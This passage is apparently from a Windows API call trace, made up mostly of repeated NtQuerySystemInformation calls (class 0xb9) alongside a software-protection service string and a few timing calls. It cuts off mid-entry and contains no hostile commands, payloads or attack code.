(_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x50, ResultLength=0x0) [0273.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x50, ResultLength=0x0) [0273.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x50, ResultLength=0x0) [0273.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x38, ResultLength=0x0) [0273.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x28, ResultLength=0x0) [0273.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x28, ResultLength=0x0) [0273.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x28, ResultLength=0x0) [0273.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccb0, Length=0x28, ResultLength=0x0) [0273.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x38, ResultLength=0x0) [0273.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd30, Length=0x28, ResultLength=0x0) [0273.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd30, Length=0x28, ResultLength=0x0) [0273.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x38, ResultLength=0x0) [0273.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x20, ResultLength=0x0) [0273.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x20, ResultLength=0x0) [0273.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x20, ResultLength=0x0) [0273.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x20, ResultLength=0x0) [0273.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x38, ResultLength=0x0) [0273.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x20, ResultLength=0x0) [0273.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x20, ResultLength=0x0) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x20, ResultLength=0x0) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.476] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a68fcf40 | out: lpSystemTimeAsFileTime=0xf7a68fcf40*(dwLowDateTime=0x355df166, dwHighDateTime=0x1d63874)) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcff8, Length=0x50, ResultLength=0x0) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf30, Length=0x28, ResultLength=0x0) [0273.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce48, Length=0x50, ResultLength=0x0) [0273.477] GetTickCount () returned 0x1184842 [0273.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd18, Length=0x58, ResultLength=0x0) [0273.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0273.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0273.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0273.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0273.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0273.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0273.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0273.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0273.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0273.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0273.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0273.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0273.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0273.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0273.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0273.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0273.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0273.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0273.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd18, Length=0x58, ResultLength=0x0) [0273.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0273.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x28, ResultLength=0x0) [0273.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0273.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0273.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x28, ResultLength=0x0) [0273.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x28, ResultLength=0x0) [0273.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0273.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0273.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x20, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x20, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x20, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0273.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0273.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0273.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0273.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x20, ResultLength=0x0) [0273.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0273.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0273.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0273.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0273.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x20, ResultLength=0x0) [0273.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0273.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0273.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd18, Length=0x58, ResultLength=0x0) [0273.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbe0, Length=0x58, ResultLength=0x0) [0273.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0273.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0273.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0273.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0273.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0273.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0273.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, 